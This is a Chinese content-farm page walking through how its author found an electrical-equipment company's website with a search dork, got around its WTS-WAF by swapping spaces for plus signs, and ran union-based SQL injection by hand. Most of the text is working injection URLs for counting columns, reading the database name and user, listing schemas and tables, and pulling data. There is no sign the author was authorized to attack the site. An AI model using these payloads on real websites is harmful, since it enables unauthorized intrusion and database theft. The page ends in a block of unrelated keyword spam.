千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

如何进行绕过WTS-WAF的分析

发表于:2025-01-19 作者:千家信息网编辑
千家信息网最后更新 2025年01月19日,本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x01.寻找目标inurl:.php?id= intext
千家信息网最后更新 2025年01月19日如何进行绕过WTS-WAF的分析

本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。


0x01.寻找目标

inurl:.php?id= intext:电器

找到了一个电器公司的网站,随便测了测,发现有waf

这还不安排(找了点资料,貌似直接加号代替空格就可以,直接尝试)

0x02.操作

发现没有waf拦截了

资料还说了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我尝试了发现无法开始

就这样子......

0x03.手注

http://*/*.php?id=1+and+1=1  #回显正常http://*/*.php?id=1+and+1=2  #回显错误说明存在注入http://*/*.php?id=1+order+by+15  #15回显错误http://*/*.php?id=1+order+by+14  #14回显正常说明有14个字段http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面

它回显了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户一些常见的函数version()  #显示数据库当前版本database() / schema()  #显示当前数据库名user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称charset(str)  #返回字符串str的字符集collation(str)  #返回字符串str的字符排列方式

0x04.查数据

爆数据库

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

它不能group_concat,那我就一个一个查了!http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个

爆数据表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆数据

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

总结:

1.工具跑不起就只能手注了

2.实践了下mysql的手注

上述内容就是如何进行绕过WTS-WAF的分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

很赞哦!
数据 字符 数据库 错误 分析 内容 字段 字符串 工具 技能 用户 电器 知识 资料 尝试 简明 简明扼要 信息 公司 函数 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 数据库授权表查询权限 海湾gst数据库 太仓手机软件开发 泾源企业网站服务器 网络药理学常用数据库及网站汇总 河北电商软件开发哪家便宜 c 服务器ip 数据库 二维码字段 外部接口与数据库连接 网络安全宣传周属于会展吗 沈阳市网络安全学校 南昌鲲鹏服务器什么价格 扬州个人软件开发推荐咨询 郑州工业软件开发哪里有 客户化开发和软件开发区别 听取网络安全 数据采集器软件开发 英雄联盟当前服务器不支持校验 网络安全拓展招聘 天津星微软件开发有限公司 网络安全护网排名 网络安全教育体会文章 大学系统一般用什么数据库 非涉密网络安全保密隐患有哪些 大学生网络安全教育课后感 国家网络安全局郭 与网络时间同步选什么服务器 谷歌安卓软件开发 网络安全小插图 软件开发咨询电话

相关文章

0